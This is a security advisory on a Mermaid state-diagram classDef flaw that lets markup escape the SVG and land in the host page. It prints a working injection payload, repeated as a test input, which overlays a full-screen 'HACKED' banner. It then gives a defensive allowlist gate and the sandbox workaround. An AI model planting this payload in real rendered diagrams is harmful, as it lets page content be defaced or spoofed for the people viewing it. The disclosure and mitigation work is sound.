Impact
Under the default configuration, Mermaid state diagrams' `classDef` statements allow DOM injection that escapes the SVG: the style value is written into the diagram's stylesheet without being escaped, so a value beginning with `</style></svg>` closes the diagram and everything after it is inserted into the host page's DOM. `<script>` tags are removed, which prevents direct script execution (XSS), but arbitrary markup and CSS still reach the page; the proof-of-concept below covers the whole viewport with a fixed full-screen overlay and then re-opens `<svg><style>` so the rest of the document stays well-formed.
Proof-of-concept
```mermaid
stateDiagram-v2
classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b
[*] --> A:::xss
```
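The following is an added example, not Mermaid's own code or the fix shipped by the project. It shows a pre-render gate that refuses a diagram source when a `classDef` style string carries markup, the vector the proof-of-concept uses, and the `mermaid.initialize()` options with and without the `"sandbox"` security level that the advisory recommends as a workaround. The function names, the allowlist regexes and the sample inputs are assumptions made here.

```javascript
// Added example (not Mermaid's own code): reject a diagram source when any
// classDef style value contains characters that can break out of the
// diagram's <style> element, and build the mermaid.initialize() options.
// All function names and regexes are hypothetical choices made for this example.

// A classDef statement: `classDef <name[,name...]> <prop:value,prop:value,...>`
const CLASSDEF_RE = /^\s*classDef\s+([A-Za-z0-9_,-]+)\s+(.*)$/;
// One style declaration. The value allowlist has no < > { } " ' / or ; so the
// `</style></svg>` prefix used by the proof-of-concept cannot pass. Widen the
// character class if your diagrams need values such as `font:5em/1 monospace`.
const STYLE_DECL_RE = /^[A-Za-z-]+:[A-Za-z0-9#%.()\s!-]*$/;

// Returns one finding per offending classDef line, or [] when the source is clean.
function findUnsafeClassDefs(diagramSource) {
  const findings = [];
  diagramSource.split(/\r?\n/).forEach((line, idx) => {
    const m = CLASSDEF_RE.exec(line);
    if (!m) return;
    // Mermaid separates style declarations with commas; check each one.
    const offending = m[2]
      .split(',')
      .map((decl) => decl.trim())
      .filter((decl) => !STYLE_DECL_RE.test(decl));
    if (offending.length) {
      findings.push({ line: idx + 1, className: m[1], offending });
    }
  });
  return findings;
}

// Options for mermaid.initialize(). With securityLevel unset Mermaid renders
// into the host page's DOM, so injected markup lands in the page; with
// "sandbox" the diagram is rendered inside a sandboxed <iframe>, which is the
// advisory's workaround when updating is not possible.
function mermaidInitOptions(hardened) {
  const options = { startOnLoad: true };
  if (hardened) options.securityLevel = 'sandbox';
  return options;
}

// Constructed inputs: the advisory's proof-of-concept and a benign diagram.
const POC_SOURCE = [
  'stateDiagram-v2',
  'classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b',
  '[*] --> A:::xss',
].join('\n');
const BENIGN_SOURCE = [
  'stateDiagram-v2',
  'classDef ok fill:#f9f,stroke:#333,stroke-width:2px',
  '[*] --> A:::ok',
].join('\n');

// Gate used before handing text to mermaid.render()/mermaid.run():
// returns the findings so the caller can log them instead of rendering.
function checkBeforeRender(diagramSource) {
  const findings = findUnsafeClassDefs(diagramSource);
  return { safeToRender: findings.length === 0, findings };
}
```

The gate is an allowlist on purpose: a denylist of `</style>` alone would miss other ways of ending the stylesheet, and legitimate `classDef` values are short `property:value` pairs that the allowlist accepts unchanged. Use it alongside, not instead of, the `"sandbox"` setting or an updated Mermaid version.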
Patches
Workarounds
If you cannot update to a patched version, setting `"securityLevel": "sandbox"` in the Mermaid configuration prevents this by rendering the diagram inside a sandboxed `<iframe>`, so any injected markup is confined to that frame instead of the host page.
Credits
Thanks to @zsxsoft from @KeenSecurityLab for reporting this vulnerability.